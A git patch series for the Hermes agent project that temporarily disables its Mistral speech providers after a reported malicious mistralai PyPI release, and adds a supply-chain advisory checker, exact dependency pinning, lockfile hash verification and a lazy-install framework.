index ba44d03c10e..f5e464f163e 100644
--- a/hermes_cli/tools_config.py
+++ b/hermes_cli/tools_config.py
@@ -205,15 +205,9 @@ TOOL_CATEGORIES = {
                 ],
                 "tts_provider": "elevenlabs",
             },
-            {
-                "name": "Mistral (Voxtral TTS)",
-                "badge": "paid",
-                "tag": "Multilingual, native Opus",
-                "env_vars": [
-                    {"key": "MISTRAL_API_KEY", "prompt": "Mistral API key", "url": "https://console.mistral.ai/"},
-                ],
-                "tts_provider": "mistral",
-            },
+            # Mistral (Voxtral TTS) temporarily hidden — `mistralai` PyPI
+            # package is currently quarantined (malicious 2.4.6 release on
+            # 2026-05-12). Restore this entry once PyPI un-quarantines.
             {
                 "name": "Google Gemini TTS",
                 "badge": "preview",
diff --git a/hermes_cli/web_server.py b/hermes_cli/web_server.py
index 0da49682b22..2a70ee26398 100644
--- a/hermes_cli/web_server.py
+++ b/hermes_cli/web_server.py
@@ -273,7 +273,9 @@ _SCHEMA_OVERRIDES: Dict[str, Dict[str, Any]] = {
     "stt.provider": {
         "type": "select",
         "description": "Speech-to-text provider",
-        "options": ["local", "openai", "mistral"],
+        # "mistral" temporarily removed — mistralai PyPI package quarantined
+        # (malicious 2.4.6 release on 2026-05-12). Restore once available.
+        "options": ["local", "openai"],
     },
     "display.skin": {
         "type": "select",
diff --git a/pyproject.toml b/pyproject.toml
index 1eba1aa1657..5d164b6535f 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -111,7 +111,10 @@ termux-all = [
   "hermes-agent[dingtalk]",
   "hermes-agent[feishu]",
   "hermes-agent[google]",
-  "hermes-agent[mistral]",
+  # mistral: omitted from broad termux-all profile — `mistralai` PyPI package
+  # is currently quarantined (malicious 2.4.6 release). Users who explicitly
+  # want Voxtral STT/TTS can still `pip install hermes-agent[mistral]`
+  # directly once PyPI un-quarantines.
   "hermes-agent[bedrock]",
   "hermes-agent[homeassistant]",
   "hermes-agent[sms]",
@@ -169,7 +172,11 @@ all = [
   "hermes-agent[dingtalk]",
   "hermes-agent[feishu]",
   "hermes-agent[google]",
-  "hermes-agent[mistral]",
+  # mistral: omitted from [all] — `mistralai` PyPI package is currently
+  # quarantined (malicious 2.4.6 release on 2026-05-12). Pulling it from
+  # [all] would break every fresh install / AUR build / Docker build / CI
+  # run until PyPI un-quarantines. Users who explicitly want Voxtral STT/TTS
+  # can still `pip install hermes-agent[mistral]` once it's available again.
   "hermes-agent[bedrock]",
   "hermes-agent[web]",
   "hermes-agent[youtube]",
diff --git a/tests/tools/test_transcription_dotenv_fallback.py b/tests/tools/test_transcription_dotenv_fallback.py
index 39f5ca108e3..73e7a42a59b 100644
--- a/tests/tools/test_transcription_dotenv_fallback.py
+++ b/tests/tools/test_transcription_dotenv_fallback.py
@@ -69,6 +69,12 @@ class TestProviderSelectionGate:
             assert tt._get_provider({"enabled": True, "provider": "groq"}) == "groq"
 
     def test_explicit_mistral_sees_dotenv(self):
+        """Mistral STT is intentionally disabled (PyPI quarantine 2026-05-12).
+
+        Even with the dotenv key visible, explicit `provider: mistral` must
+        return "none" with a warning. Restore the previous behavior once
+        `mistralai` is un-quarantined on PyPI.
+        """
         from tools import transcription_tools as tt
 
         with patch.object(tt, "_HAS_FASTER_WHISPER", False), \
@@ -76,7 +82,7 @@ class TestProviderSelectionGate:
              patch.object(tt, "_has_local_command", return_value=False), \
              patch("hermes_cli.config.load_env",
                    return_value={"MISTRAL_API_KEY": "dotenv-secret"}):
-            assert tt._get_provider({"enabled": True, "provider": "mistral"}) == "mistral"
+            assert tt._get_provider({"enabled": True, "provider": "mistral"}) == "none"
 
     def test_explicit_xai_sees_dotenv(self):
         from tools import transcription_tools as tt
diff --git a/tests/tools/test_transcription_tools.py b/tests/tools/test_transcription_tools.py
index e5b27d9e4d4..ce45cb9f1e6 100644
--- a/tests/tools/test_transcription_tools.py
+++ b/tests/tools/test_transcription_tools.py
@@ -978,16 +978,23 @@ class TestTranscribeMistral:
 # ============================================================================
 
 class TestGetProviderMistral:
-    """Mistral-specific provider selection tests."""
+    """Mistral-specific provider selection tests.
+
+    Mistral STT is intentionally disabled in 2026-05-12+ while the
+    `mistralai` PyPI package is quarantined. These tests document that
+    explicit `provider: mistral` always returns "none" with a warning, and
+    that auto-detect skips mistral entirely.
+    """
 
     def test_mistral_when_key_and_sdk_available(self, monkeypatch):
+        """Even with key + SDK, explicit mistral returns 'none' (disabled)."""
         monkeypatch.setenv("MISTRAL_API_KEY", "test-key")
         with patch("tools.transcription_tools._HAS_MISTRAL", True):
             from tools.transcription_tools import _get_provider
-            assert _get_provider({"provider": "mistral"}) == "mistral"
+            assert _get_provider({"provider": "mistral"}) == "none"
 
     def test_mistral_explicit_no_key_returns_none(self, monkeypatch):
-        """Explicit mistral with no key returns none — no cross-provider fallback."""
+        """Explicit mistral with no key returns none."""
         monkeypatch.delenv("MISTRAL_API_KEY", raising=False)
         with patch("tools.transcription_tools._HAS_MISTRAL", True):
             from tools.transcription_tools import _get_provider
@@ -1000,18 +1007,23 @@ class TestGetProviderMistral:
             from tools.transcription_tools import _get_provider
             assert _get_provider({"provider": "mistral"}) == "none"
 
-    def test_auto_detect_mistral_after_openai(self, monkeypatch):
-        """Auto-detect: mistral is tried after openai when both are unavailable."""
+    def test_auto_detect_skips_mistral(self, monkeypatch):
+        """Auto-detect intentionally skips mistral (quarantine workaround).
+
+        With no other provider available but MISTRAL_API_KEY set, the result
+        must be 'none' — mistral is no longer in the auto-detect chain.
+        """
         monkeypatch.delenv("GROQ_API_KEY", raising=False)
         monkeypatch.delenv("VOICE_TOOLS_OPENAI_KEY", raising=False)
         monkeypatch.delenv("OPENAI_API_KEY", raising=False)
+        monkeypatch.delenv("XAI_API_KEY", raising=False)
         monkeypatch.setenv("MISTRAL_API_KEY", "test-key")
         with patch("tools.transcription_tools._HAS_FASTER_WHISPER", False), \
              patch("tools.transcription_tools._has_local_command", return_value=False), \
              patch("tools.transcription_tools._HAS_OPENAI", False), \
              patch("tools.transcription_tools._HAS_MISTRAL", True):
             from tools.transcription_tools import _get_provider
-            assert _get_provider({}) == "mistral"
+            assert _get_provider({}) == "none"
 
     def test_auto_detect_openai_preferred_over_mistral(self, monkeypatch):
         """Auto-detect: openai is preferred over mistral (both paid, openai more common)."""
@@ -1285,8 +1297,13 @@ class TestGetProviderXAI:
             from tools.transcription_tools import _get_provider
             assert _get_provider({}) == "xai"
 
-    def test_auto_detect_mistral_preferred_over_xai(self, monkeypatch):
-        """Auto-detect: mistral is preferred over xai."""
+    def test_auto_detect_mistral_skipped_xai_wins(self, monkeypatch):
+        """Auto-detect skips mistral entirely (quarantine) — xai wins.
+
+        Even with MISTRAL_API_KEY set, mistral is no longer in the
+        auto-detect chain. xai is the next-best fallback when the
+        local/groq/openai chain is unavailable.
+        """
         monkeypatch.setenv("MISTRAL_API_KEY", "test-key")
         monkeypatch.setenv("XAI_API_KEY", "xai-test")
         monkeypatch.delenv("GROQ_API_KEY", raising=False)
@@ -1297,7 +1314,7 @@ class TestGetProviderXAI:
              patch("tools.transcription_tools._HAS_OPENAI", False), \
              patch("tools.transcription_tools._HAS_MISTRAL", True):
             from tools.transcription_tools import _get_provider
-            assert _get_provider({}) == "mistral"
+            assert _get_provider({}) == "xai"
 
     def test_auto_detect_no_key_returns_none(self, monkeypatch):
         """Auto-detect: xai skipped when no key is set."""
diff --git a/tests/tools/test_tts_mistral.py b/tests/tools/test_tts_mistral.py
index 6e98946b6c0..818a6c1d117 100644
--- a/tests/tools/test_tts_mistral.py
+++ b/tests/tools/test_tts_mistral.py
@@ -162,27 +162,34 @@ class TestGenerateMistralTts:
 
 
 class TestTtsDispatcherMistral:
-    def test_dispatcher_routes_to_mistral(
+    def test_dispatcher_returns_disabled_error(
         self, tmp_path, mock_mistral_module, monkeypatch
     ):
+        """Mistral TTS is intentionally disabled (PyPI quarantine 2026-05-12).
+
+        The dispatcher must short-circuit with a clear status message before
+        attempting any SDK import, even when MISTRAL_API_KEY is set and a
+        mock SDK is wired in. Restore routing once `mistralai` is
+        un-quarantined on PyPI.
+        """
         import json
 
         from tools.tts_tool import text_to_speech_tool
 
         monkeypatch.setenv("MISTRAL_API_KEY", "test-key")
-        mock_mistral_module.audio.speech.complete.return_value = MagicMock(
-            audio_data=base64.b64encode(b"audio").decode()
-        )
 
         output_path = str(tmp_path / "out.mp3")
         with patch("tools.tts_tool._load_tts_config", return_value={"provider": "mistral"}):
             result = json.loads(text_to_speech_tool("Hello", output_path=output_path))
 
-        assert result["success"] is True
-        assert result["provider"] == "mistral"
-        mock_mistral_module.audio.speech.complete.assert_called_once()
+        assert result["success"] is False
+        assert "temporarily disabled" in result["error"]
+        assert "quarantined" in result["error"]
+        # SDK must not have been called.
+        mock_mistral_module.audio.speech.complete.assert_not_called()
 
     def test_dispatcher_returns_error_when_sdk_not_installed(self, tmp_path, monkeypatch):
+        """Same disabled message regardless of SDK presence."""
         import json
 
         from tools.tts_tool import text_to_speech_tool
@@ -196,7 +203,7 @@ class TestTtsDispatcherMistral:
             )
 
         assert result["success"] is False
-        assert "mistralai" in result["error"]
+        assert "temporarily disabled" in result["error"]
 
 
 class TestCheckTtsRequirementsMistral:
diff --git a/tools/transcription_tools.py b/tools/transcription_tools.py
index 663345eb747..5009947895c 100644
--- a/tools/transcription_tools.py
+++ b/tools/transcription_tools.py
@@ -252,11 +252,16 @@ def _get_provider(stt_config: dict) -> str:
             return "none"
 
         if provider == "mistral":
-            if _HAS_MISTRAL and get_env_value("MISTRAL_API_KEY"):
-                return "mistral"
+            # `mistralai` PyPI package was quarantined on 2026-05-12 after a
+            # malicious 2.4.6 release. Refuse to use this provider until it's
+            # available again so we surface a clear message instead of an
+            # opaque ImportError mid-call.
             logger.warning(
-                "STT provider 'mistral' configured but mistralai package "
-                "not installed or MISTRAL_API_KEY not set"
+                "STT provider 'mistral' (Voxtral Transcribe) is temporarily "
+                "disabled — `mistralai` PyPI package is quarantined "
+                "(malicious 2.4.6 release on 2026-05-12). Falling back to "
+                "another provider. Set stt.provider in config.yaml to 'local' "
+                "or 'openai' to silence this warning."
             )
             return "none"
 
@@ -270,7 +275,9 @@ def _get_provider(stt_config: dict) -> str:
 
         return provider  # Unknown — let it fail downstream
 
-    # --- Auto-detect (no explicit provider): local > groq > openai > mistral > xai -
+    # --- Auto-detect (no explicit provider): local > groq > openai > xai ---
+    # mistral is intentionally skipped while `mistralai` is quarantined on
+    # PyPI (malicious 2.4.6 release on 2026-05-12).
 
     if _HAS_FASTER_WHISPER:
         return "local"
@@ -282,9 +289,6 @@ def _get_provider(stt_config: dict) -> str:
     if _HAS_OPENAI and _has_openai_audio_backend():
         logger.info("No local STT available, using OpenAI Whisper API")
         return "openai"
-    if _HAS_MISTRAL and get_env_value("MISTRAL_API_KEY"):
-        logger.info("No local STT available, using Mistral Voxtral Transcribe API")
-        return "mistral"
     if get_env_value("XAI_API_KEY"):
         logger.info("No local STT available, using xAI Grok STT API")
         return "xai"
diff --git a/tools/tts_tool.py b/tools/tts_tool.py
index 95958fd1833..31e080332b1 100644
--- a/tools/tts_tool.py
+++ b/tools/tts_tool.py
@@ -1662,16 +1662,21 @@ def text_to_speech_tool(
             _generate_xai_tts(text, file_str, tts_config)
 
         elif provider == "mistral":
-            try:
-                _import_mistral_client()
-            except ImportError:
-                return json.dumps({
-                    "success": False,
-                    "error": "Mistral provider selected but 'mistralai' package not installed. "
-                             "Run: pip install 'hermes-agent[mistral]'"
-                }, ensure_ascii=False)
-            logger.info("Generating speech with Mistral Voxtral TTS...")
-            _generate_mistral_tts(text, file_str, tts_config)
+            # `mistralai` PyPI package was quarantined on 2026-05-12 after a
+            # malicious 2.4.6 release. Surface a clear status message instead
+            # of attempting an import that would either fail or pull a stale
+            # cached package.
+            return json.dumps({
+                "success": False,
+                "error": (
+                    "Mistral Voxtral TTS is temporarily disabled. The "
+                    "`mistralai` PyPI package was quarantined on 2026-05-12 "
+                    "after a malicious 2.4.6 release. Switch tts.provider in "
+                    "config.yaml to 'edge', 'elevenlabs', 'openai', 'minimax', "
+                    "'gemini', 'xai', 'neutts', or 'kittentts'. Mistral "
+                    "support will return once PyPI un-quarantines the package."
+                ),
+            }, ensure_ascii=False)
 
         elif provider == "gemini":
             logger.info("Generating speech with Google Gemini TTS...")

From c1eb2dcda7d729e7c5353ec7b5744f331aa752fe Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 01:02:25 -0700
Subject: [PATCH 09/59] feat(security): supply-chain advisory checker +
 lazy-install framework + tiered install fallback (#24220)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(security): supply-chain advisory checker + lazy-install framework + tiered install fallback

Three coordinated mitigations for the Mini Shai-Hulud worm hitting
mistralai 2.4.6 on PyPI (2026-05-12) and for the next single-package
compromise that follows.

# What this PR makes true

1. Users with the poisoned mistralai 2.4.6 in their venv get a loud
   detection banner with copy-pasteable remediation steps the moment
   they run hermes (and on every gateway startup).
2. One quarantined / yanked PyPI package can no longer silently demote
   a fresh install to 'core only' — the installer keeps every other
   extra and tells the user which tier landed.
3. Future opt-in backends (Mistral, ElevenLabs, Honcho, etc.) can
   lazy-install on first use under a strict allowlist, instead of
   eagerly pulling everything at install time.

# Detection: hermes_cli/security_advisories.py

- ADVISORIES catalog (one entry currently: shai-hulud-2026-05 for
  mistralai==2.4.6). Adding the next one is a single dataclass.
- detect_compromised() uses importlib.metadata.version() — no pip
  dependency, works in uv venvs that lack pip.
- Banner cache (~/.hermes/cache/advisory_banner_seen) rate-limits
  the startup banner to once per 24h per advisory.
- Acks persisted to security.acked_advisories in config.yaml; never
  re-banner after ack.
- Wired into:
  * hermes doctor — runs first, prints full remediation block
  * hermes doctor --ack <id> — dismisses an advisory
  * cli.py interactive run() and single-query branches — short
    stderr banner pointing at hermes doctor
  * gateway/run.py startup — operator-visible warning in gateway.log

# Lazy-install framework: tools/lazy_deps.py

- LAZY_DEPS allowlist maps namespaced feature keys (tts.elevenlabs,
  memory.honcho, provider.bedrock, etc.) to pip specs.
- ensure(feature) installs missing deps in the active venv via the
  uv → pip → ensurepip ladder (matches tools_config._pip_install).
- Strict spec safety regex rejects URLs, file paths, shell metas,
  pip flag injection, control chars — only PyPI-by-name accepted.
- Gated on security.allow_lazy_installs (default true) plus the
  HERMES_DISABLE_LAZY_INSTALLS env var for restricted/audited envs.
- Migrated three backends as proof of pattern:
  * tools/tts_tool.py — _import_elevenlabs() calls ensure first
  * plugins/memory/honcho/client.py — get_honcho_client lazy-installs
  * tts.mistral / stt.mistral entries pre-registered for when PyPI
    restores mistralai

# Installer fallback tiers

scripts/install.sh, scripts/install.ps1, setup-hermes.sh:

- Centralised _BROKEN_EXTRAS list (currently: mistral). Edit one
  array when a transitive breaks; users keep every other extra.
- New 'all minus known-broken' tier between [all] and the existing
  PyPI-only-extras tier. Only kicks in when [all] fails resolve.
- All three tiers explicit: every fallback announces which tier
  landed and prints a re-run hint when not on Tier 1.
- install.ps1 and install.sh both regenerate their tier specs from
  the same _BROKEN_EXTRAS array so updates stay in sync.

Side effect: install.ps1 Tier 2 spec previously hardcoded 'mistral'
in its extra list — bug fixed by the refactor (mistral is filtered
out).

# Config

hermes_cli/config.py — DEFAULT_CONFIG.security gains:
- acked_advisories: []  (advisory IDs the user has dismissed)
- allow_lazy_installs: True  (security gate for ensure())

No config version bump needed — both keys nest under existing
security: block, and load_config's deep-merge picks up DEFAULT_CONFIG
defaults for users with older configs.

# Tests

tests/hermes_cli/test_security_advisories.py — 23 tests covering:
- detect_compromised matches/non-matches, wildcard frozenset
- ack persistence, idempotence, blank rejection, config-failure path
- banner cache rate limiting + 24h re-banner + ack-stops-banner
- short_banner_lines / full_remediation_text / render_doctor_section /
  gateway_log_message
- shipped catalog well-formedness invariant

tests/tools/test_lazy_deps.py — 40 tests covering:
- spec safety: 11 safe parametrized + 18 unsafe parametrized
- allowlist: unknown-feature rejection, namespace.name shape,
  every shipped spec passes the safety regex
- security gating: config flag, env var, default, fail-open
- ensure() happy/sad paths: already-satisfied, install success,
  pip stderr surfaced on failure, install-succeeds-but-still-missing
- is_available, feature_install_command

Combined: 63 new tests, all passing under scripts/run_tests.sh.

# Validation

- scripts/run_tests.sh tests/hermes_cli/test_security_advisories.py
  tests/tools/test_lazy_deps.py → 63/63 passing
- scripts/run_tests.sh tests/hermes_cli/test_doctor.py
  tests/hermes_cli/test_doctor_command_install.py
  tests/tools/test_tts_mistral.py tests/tools/test_transcription_tools.py
  tests/tools/test_transcription_dotenv_fallback.py → 165/165 passing
- scripts/run_tests.sh tests/hermes_cli/ tests/tools/ →
  9191 passed, 8 pre-existing failures (verified on origin/main
  before this change)
- bash -n on install.sh and setup-hermes.sh → OK
- py_compile on all modified .py files → OK
- End-to-end smoke test of detect_compromised + render_doctor_section
  + gateway_log_message with mocked installed version → produces
  copy-pasteable remediation output

# Community

Full advisory + remediation steps:
website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md

Short-form post drafts (Discord, GitHub pinned issue, README banner):
scripts/community-announcement-shai-hulud.md

Refs: PR #24205 (mistral disabled), Socket Security advisory
<https://socket.dev/blog/mini-shai-hulud-worm-pypi>

* build(deps): pin every direct dep to ==X.Y.Z (no ranges)

Companion to the supply-chain advisory work: replace every >=/</~= range
in pyproject.toml's [project.dependencies] and [project.optional-dependencies]
with an exact ==X.Y.Z pin sourced from uv.lock.

Why: ranges allow PyPI to ship a fresh version of any direct dep at any
time without a code review on our side. With ranges, the malicious
mistralai 2.4.6 release would have been pulled by every fresh
'pip install -e .[all]' for the hours between upload and PyPI's
quarantine — exactly the install window we got hit on. Exact pins close
that window: the only way a new package version reaches a user is via
an intentional update on our end.

What the user-facing change is: nothing, behavior-wise. Every package
resolves to the same version it was already resolving to via uv.lock —
the pins just remove the resolver's freedom to pick a different one.

Cost: any user installing Hermes alongside another package that requires
a newer pin gets a resolver conflict. Acceptable for our isolated-venv
install path; documented in the new comment block.

Build-system requires line (setuptools>=61.0) is intentionally left
as a range — pinning the build backend would block fresh pip from
bootstrapping the build on architectures where that exact wheel isn't
available.

mistral extra (mistralai==2.3.0) is pinned but stays out of [all]
(per PR #24205). 'uv lock' regeneration will fail until PyPI restores
mistralai; lockfile regeneration is gated behind that, NOT on every PR.

LAZY_DEPS in tools/lazy_deps.py also moved to exact pins so the lazy-
install pathway can never resolve a different version than the one
declared in pyproject.toml.

Validation:

- Cross-checked all 77 pinned direct deps in pyproject.toml against
  uv.lock — every pin matches the resolved version exactly.
- Cross-checked all LAZY_DEPS specs against uv.lock — same.
- 'uv pip install -e .[all] --dry-run' resolves 205 packages cleanly.
- tests/tools/test_lazy_deps.py + tests/hermes_cli/test_security_advisories.py
  → 63/63 passing (every shipped spec passes the safety regex).
- Doctor + TTS + transcription targeted suite → 146/146 passing.

* build(deps): hash-verify transitives via uv.lock; remove unresolvable [mistral] extra

You asked: 'what about the dependencies the dependencies rely on?' —
correctly noting that exact-pinning direct deps in pyproject.toml does
NOT cover the transitive graph. `pip install` and `uv pip install` both
re-resolve transitives fresh from PyPI at install time, so a compromised
transitive (e.g. `httpcore` if it got worm-poisoned tomorrow) would
still hit our users even with every direct dep exact-pinned.

# What this commit fixes

1. **Both real installer scripts now prefer `uv sync --locked` as Tier 0.**
   uv.lock records SHA256 hashes for every transitive — a compromised
   package with a different hash gets REJECTED. Falls through to the
   existing `uv pip install` cascade if the lockfile is missing or
   stale, with a loud warning that the fallback path does NOT
   hash-verify transitives. Previously only `setup-hermes.sh` (the dev
   path) used the lockfile; `scripts/install.sh` and `scripts/install.ps1`
   (the paths fresh users actually run) skipped it.

2. **Removed the `[mistral]` extra entirely.** The `mistralai` PyPI
   project is fully quarantined right now — every version returns 404,
   so any pin we wrote was unresolvable, which broke `uv lock --check`
   in CI. Restoration is documented in pyproject.toml as a 5-step
   checklist (verify, re-add extra, re-enable in 4 modules, regenerate
   lock, optionally re-add to [all]).

3. **Regenerated uv.lock.** 262 packages, mistralai/eval-type-backport/
   jsonpath-python pruned. `uv lock --check` now passes.

# Defense-in-depth view

| Layer                      | Where             | Protects against                          |
|----------------------------|-------------------|-------------------------------------------|
| Exact pins in pyproject    | direct deps       | new mistralai 2.4.6-style direct compromise |
| uv.lock + `--locked` install | transitive graph  | transitive worm injection                  |
| Tier-0 hash-verified path  | install.sh / .ps1 | actually USE the lockfile in fresh installs |
| `uv lock --check` CI gate  | every PR          | drift between pyproject and lockfile      |
| `hermes_cli/security_advisories.py` | runtime  | cleanup for users who already got hit      |

The exact pinning + hash verification together close the supply-chain
gap. Without the lockfile path, exact pins alone are theater.

# Validation

- `uv lock --check` → passes (262 packages resolved, no drift).
- `bash -n` on install.sh + setup-hermes.sh → OK.
- 209/209 tests passing across new + adjacent test files
  (test_lazy_deps.py, test_security_advisories.py, test_doctor.py,
  test_tts_mistral.py, test_transcription_tools.py).
- TOML parse OK.

* chore: remove community announcement drafts (PR body covers it)

* build(deps): lazy-install every opt-in backend (anthropic, search, terminal, platforms, dashboard)

Extends the lazy-install framework to cover everything that's not used by
every hermes session. Base install drops from ~60 packages to 45.

Moved out of core dependencies = []:
- anthropic   (only when provider=anthropic native, not via aggregators)
- exa-py, firecrawl-py, parallel-web (search backends; only when picked)
- fal-client  (image gen; only when picked)
- edge-tts    (default TTS but still optional)

New extras in pyproject.toml: [anthropic] [exa] [firecrawl] [parallel-web]
[fal] [edge-tts]. All added to [all].

New LAZY_DEPS entries: provider.anthropic, search.{exa,firecrawl,parallel},
tts.edge, image.fal, memory.hindsight, platform.{telegram,discord,matrix},
terminal.{modal,daytona,vercel}, tool.dashboard.

Each import site now calls ensure() before importing the SDK. Where the
module had a top-level try/except (telegram, discord, fastapi), the
graceful-fallback pattern was extended to lazy-install on first
check_*_requirements() call and re-bind module globals.

Updated test_windows_native_support.py tzdata check from snapshot
(>=2023.3 literal) to invariant (any version + win32 marker).

Validation:
- Base install: 45 packages (was ~60); 6 newly-extracted packages absent
- uv lock --check: passes (262 packages, no drift)
- 209/209 lazy_deps + advisory + doctor + tts/transcription tests passing
- py_compile clean on all 12 modified modules
---
 agent/anthropic_adapter.py                    |   8 +
 cli.py                                        |  38 +-
 gateway/platforms/discord.py                  |  28 +-
 gateway/platforms/telegram.py                 |  54 ++-
 gateway/run.py                                |  24 +
 hermes_cli/config.py                          |  15 +
 hermes_cli/doctor.py                          |  86 +++-
 hermes_cli/main.py                            |  10 +
 hermes_cli/security_advisories.py             | 451 ++++++++++++++++++
 hermes_cli/web_server.py                      |  20 +-
 plugins/memory/hindsight/__init__.py          |   7 +
 plugins/memory/honcho/client.py               |  18 +-
 pyproject.toml                                | 164 ++++---
 scripts/install.ps1                           |  80 +++-
 scripts/install.sh                            | 128 ++++-
 setup-hermes.sh                               |  56 ++-
 tests/hermes_cli/test_security_advisories.py  | 330 +++++++++++++
 tests/tools/test_lazy_deps.py                 | 228 +++++++++
 tests/tools/test_windows_native_support.py    |  21 +-
 tools/environments/daytona.py                 |   7 +
 tools/environments/modal.py                   |  13 +
 tools/environments/vercel_sandbox.py          |  16 +
 tools/image_generation_tool.py                |   7 +
 tools/lazy_deps.py                            | 441 +++++++++++++++++
 tools/tts_tool.py                             |  25 +-
 tools/web_tools.py                            |  28 ++
 uv.lock                                       | 235 +++++----
 .../shai-hulud-mistralai-2026-05.md           | 138 ++++++
 28 files changed, 2433 insertions(+), 243 deletions(-)
 create mode 100644 hermes_cli/security_advisories.py
 create mode 100644 tests/hermes_cli/test_security_advisories.py
 create mode 100644 tests/tools/test_lazy_deps.py
 create mode 100644 tools/lazy_deps.py
 create mode 100644 website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md

diff --git a/agent/anthropic_adapter.py b/agent/anthropic_adapter.py
index b4ce2da99d1..3919c8565b2 100644
--- a/agent/anthropic_adapter.py
+++ b/agent/anthropic_adapter.py
@@ -35,6 +35,14 @@ def _get_anthropic_sdk():
     """Return the ``anthropic`` SDK module, importing lazily. None if not installed."""
     global _anthropic_sdk
     if _anthropic_sdk is ...:
+        try:
+            from tools.lazy_deps import ensure as _lazy_ensure
+            _lazy_ensure("provider.anthropic", prompt=False)
+        except ImportError:
+            pass
+        except Exception:
+            # FeatureUnavailable — fall through to ImportError handling below
+            pass
         try:
             import anthropic as _sdk
             _anthropic_sdk = _sdk
diff --git a/cli.py b/cli.py
index 37f2a96b5a0..ea167b6b411 100644
--- a/cli.py
+++ b/cli.py
@@ -4214,12 +4214,34 @@ class HermesCLI:
             ChatConsole().print(f"[bold red]Failed to initialize agent: {e}[/]")
             return False
     
+    def _show_security_advisories(self):
+        """Show a startup banner if any unacked security advisories match.
+
+        Renders a single bold-red box on stderr (so piped stdout remains
+        clean) listing the worst hit and pointing at ``hermes doctor``.
+        Banner-cache rate-limits this to once per 24h per advisory; full
+        remediation lives behind ``hermes doctor`` so the banner stays
+        small.
+        """
+        try:
+            from hermes_cli.security_advisories import (
+                detect_compromised,
+                startup_banner,
+            )
+            hits = detect_compromised()
+            banner = startup_banner(hits)
+            if banner:
+                # Print to stderr — keeps stdout clean for piped automation,
+                # and Rich's banner rendering already wrote to stdout above.
+                print(banner, file=sys.stderr, flush=True)
+        except Exception:
+            # Never let the security banner block startup. Failures are
+            # logged at DEBUG by the advisory module.
+            pass
+
     def show_banner(self):
         """Display the welcome banner in Claude Code style."""
         self.console.clear()
-
-        # Get context length for display before branching so it remains
-        # available to the low-context warning logic in compact mode too.
         ctx_len = None
         if hasattr(self, 'agent') and self.agent and hasattr(self.agent, 'context_compressor'):
             ctx_len = self.agent.context_compressor.context_length
@@ -11016,10 +11038,9 @@ class HermesCLI:
             pass
 
         self.show_banner()
-
-        # One-line Honcho session indicator (TTY-only, not captured by agent).
-        # Only show when the user explicitly configured Honcho for Hermes
-        # (not auto-enabled from a stray HONCHO_API_KEY env var).
+        # Surface any active supply-chain security advisories right after the
+        # welcome banner. Quiet/single-query paths call this themselves.
+        self._show_security_advisories()
         # If resuming a session, load history and display it immediately
         # so the user has context before typing their first message.
         if self._resumed:
@@ -13528,6 +13549,9 @@ def main(
             _query_label = query or ("[image attached]" if single_query_images else "")
             if _query_label:
                 cli.console.print(f"[bold blue]Query:[/] {_query_label}")
+            # Surface security advisories before the agent runs — short
+            # banner, doesn't depend on the welcome banner being shown.
+            cli._show_security_advisories()
             cli.chat(query, images=single_query_images or None)
             cli._print_exit_summary()
         return
diff --git a/gateway/platforms/discord.py b/gateway/platforms/discord.py
index 5113f49f179..1817ece173d 100644
--- a/gateway/platforms/discord.py
+++ b/gateway/platforms/discord.py
@@ -86,8 +86,32 @@ def _clean_discord_id(entry: str) -> str:
 
 
 def check_discord_requirements() -> bool:
-    """Check if Discord dependencies are available."""
-    return DISCORD_AVAILABLE
+    """Check if Discord dependencies are available.
+
+    Lazy-installs discord.py via ``tools.lazy_deps.ensure("platform.discord")``
+    on first call if not present. After successful install, re-binds module
+    globals so ``DISCORD_AVAILABLE`` becomes True.
+    """
+    global DISCORD_AVAILABLE, discord, DiscordMessage, Intents, commands
+    if DISCORD_AVAILABLE:
+        return True
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("platform.discord", prompt=False)
+    except Exception:
+        return False
+    try:
+        import discord as _discord
+        from discord import Message as _DM, Intents as _Intents
+        from discord.ext import commands as _commands
+    except ImportError:
+        return False
+    discord = _discord
+    DiscordMessage = _DM
+    Intents = _Intents
+    commands = _commands
+    DISCORD_AVAILABLE = True
+    return True
 
 
 def _build_allowed_mentions():
diff --git a/gateway/platforms/telegram.py b/gateway/platforms/telegram.py
index 8e937d7573f..e91a38ac6b1 100644
--- a/gateway/platforms/telegram.py
+++ b/gateway/platforms/telegram.py
@@ -103,8 +103,58 @@ _TELEGRAM_IMAGE_EXT_TO_MIME = {
 
 
 def check_telegram_requirements() -> bool:
-    """Check if Telegram dependencies are available."""
-    return TELEGRAM_AVAILABLE
+    """Check if Telegram dependencies are available.
+
+    If python-telegram-bot is missing, attempts to lazy-install it via
+    ``tools.lazy_deps.ensure("platform.telegram")``. After a successful
+    install, re-imports the SDK and flips ``TELEGRAM_AVAILABLE`` to True
+    so the adapter's class-level type aliases get rebound.
+    """
+    global TELEGRAM_AVAILABLE, Update, Bot, Message, InlineKeyboardButton
+    global InlineKeyboardMarkup, LinkPreviewOptions, Application
+    global CommandHandler, CallbackQueryHandler, TelegramMessageHandler
+    global ContextTypes, filters, ParseMode, ChatType, HTTPXRequest
+    if TELEGRAM_AVAILABLE:
+        return True
+    try:
+        from tools.lazy_deps import ensure as _lazy_ensure
+        _lazy_ensure("platform.telegram", prompt=False)
+    except Exception:
+        return False
+    try:
+        from telegram import Update as _Update, Bot as _Bot, Message as _Message
+        from telegram import InlineKeyboardButton as _IKB, InlineKeyboardMarkup as _IKM
+        try:
+            from telegram import LinkPreviewOptions as _LPO
+        except ImportError:
+            _LPO = None
+        from telegram.ext import (
+            Application as _App, CommandHandler as _CH,
+            CallbackQueryHandler as _CQH,
+            MessageHandler as _MH,
+            ContextTypes as _CT, filters as _filters,
+        )
+        from telegram.constants import ParseMode as _PM, ChatType as _CtT
+        from telegram.request import HTTPXRequest as _HR
+    except ImportError:
+        return False
+    Update = _Update
+    Bot = _Bot
+    Message = _Message
+    InlineKeyboardButton = _IKB
+    InlineKeyboardMarkup = _IKM
+    LinkPreviewOptions = _LPO
+    Application = _App
+    CommandHandler = _CH
+    CallbackQueryHandler = _CQH
+    TelegramMessageHandler = _MH
+    ContextTypes = _CT
+    filters = _filters
+    ParseMode = _PM
+    ChatType = _CtT
+    HTTPXRequest = _HR
+    TELEGRAM_AVAILABLE = True
